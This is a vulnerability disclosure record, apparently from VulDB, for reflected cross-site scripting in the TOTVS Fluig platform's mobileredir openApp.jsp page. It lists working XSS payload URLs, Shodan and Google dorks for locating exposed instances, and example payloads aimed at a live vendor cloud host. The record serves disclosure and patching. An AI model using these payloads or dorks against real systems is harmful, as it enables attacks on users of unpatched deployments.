| Title | Totvs TOTVS Fluig Plataform 1.6.X - 1.8.1 Cross-Site Scripting |
|---|
| Description | TOTVS Fluig Plataform 1.6.X - 1.8.1 - Cross-Site Scripting
The TOTVS Fluig platform, in its versions from 1.6.1.X to 1.8.1, is vulnerable to Cross-Site Scripting in the 'redirectUrl' and 'user' parameters within the 'mobileredir' module.
Fluig is the productivity and collaboration platform that integrates with the ERP system, developed by Brazil's largest technology company, TOTVS, and hosted on the client's server.
Versions affecteds:
--
Fluig 1.6.X - Fluig 1.8.1
…
Attack Vector
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=
https://fluig.host.com/mobileredir/openApp.jsp?user=
Payloads:
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://fluig.host.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
Dorks
Shodan:
https://www.shodan.io/search?query=fluig1
Google Dork:
inurl:"/portal/home" intitle:"Fluig"
intitle:fluig
Examples using a system hosted on Totvs's Fluig cloud:
https://mobile.fluig.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://mobile.fluig.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
|
|---|
| User | erickfernandox (UID 57733) |
|---|
| Submission | 11/11/2023 00:57 (2 years ago) |
|---|
| Moderation | 11/24/2023 08:40 (13 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 246104 [TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 mobileredir /mobileredir/openApp.jsp redirectUrl/user cross site scripting] |
|---|
| Points | 17 |
|---|